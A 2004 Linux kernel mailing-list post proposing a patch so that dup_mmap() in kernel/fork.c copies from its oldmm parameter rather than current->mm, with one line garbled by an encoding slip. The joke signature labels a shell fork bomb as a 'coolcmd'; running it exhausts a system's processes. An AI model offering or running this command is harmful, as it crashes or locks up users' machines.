From what I see, dup_mmap() is supposed to copy from its parameter oldmm into
the other parameter mm, but it seems it copies from current->mm into mm.
oldmm is only used for locking.
This doesn't matter in current usage of the code since dup_mmap() is
only called with oldmm==current->mm, but it still looks wrong to me. If it's
supposed to be that way I'd would like to know why.
Here's a patch. Which should be correct. (it compiles with no errors? ship it)
--- kernel/fork.c.orig 2004-09-05 12:56:43.000000000 +0200
+++ kernel/fork.c 2004-09-05 16:15:06.000000000 +0200
@@ -275,7 +275,7 @@
struct mempolicy *pol;
down_write(&oldmm->mmap_sem);
- flush_cache_mm(current->mm);
+ flush_cache_mm(oldmm);
mm->locked_vm = 0;
mm->mmap = NULL;
mm->mmap_cache = NULL;
@@ -295,11 +295,11 @@
* Add it first so that swapoff can see any swap entries.
*/
spin_lock(&mmlist_lock);
- list_add(&mm->mmlist, ¤t->mm->mmlist);
+ list_add(&mm->mmlist, &oldmm->mmlist);
mmlist_nr++;
spin_unlock(&mmlist_lock);
- for (mpnt = current->mm->mmap ; mpnt ; mpnt = mpnt->vm_next) {
+ for (mpnt = oldmm->mmap ; mpnt ; mpnt = mpnt->vm_next) {
struct file *file;
if(mpnt->vm_flags & VM_DONTCOPY)
@@ -354,7 +354,7 @@
rb_parent = &tmp->vm_rb;
mm->map_count++;
- retval = copy_page_range(mm, current->mm, tmp);
+ retval = copy_page_range(mm, oldmm, tmp);
spin_unlock(&mm->page_table_lock);
if (tmp->vm_ops && tmp->vm_ops->open)
@@ -366,7 +366,7 @@
retval = 0;
out:
- flush_tlb_mm(current->mm);
+ flush_tlb_mm(oldmm);
up_write(&oldmm->mmap_sem);
return retval;
fail_nomem_policy:
---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;